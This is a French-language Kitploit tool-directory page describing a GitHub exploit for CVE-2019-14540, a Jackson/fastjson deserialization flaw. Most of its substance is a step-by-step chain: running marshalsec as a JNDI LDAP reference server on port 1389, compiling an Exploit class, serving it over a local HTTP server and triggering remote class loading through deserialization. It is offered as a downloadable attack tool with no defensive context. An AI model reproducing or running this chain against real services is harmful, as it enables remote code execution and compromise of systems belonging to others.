Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2019-14540-exploit — CVE-2019-14540 Exploit | Kitploit
Outils/GitHubGitHub/leadroyal/cve-2019-14540-exploit
Dynamic Analysis (Sandboxing)Payload GenerationVulnerability AnalysisExploitationWeb Application Exploitation
GitHubleadroyal/cve-2019-14540-exploit

cve-2019-14540-exploit

CVE-2019-14540 Exploit

Voir le dépôt
219il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-14540 Exploit

http://www.leadroyal.cn/?p=939

Contrainte d'environnement : comme cette démo utilise la méthode d'exploitation JNDI via LDAP, il est nécessaire d'utiliser une version basse de JDK (inférieure à 8u191).

1. Utiliser marshalsec pour créer un service LDAP sur le port local 1389, pointant vers un service HTTP local sur le port 8000

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389

2. Compiler le code à charger à distance dans le dossier remote_codebase

root@kitploit:~
cd remote_codebase
javac Exploit.java

3. Démarrer un service HTTP local sur le port 8000 dans le dossier remote_codebase

root@kitploit:~
cd remote_codebase
python -m SimpleHTTPServer

4. Exécuter Main.java, utiliser les désérialisations jackson et fastjson pour déclencher la vulnérabilité

demo.png

Télécharger l’outil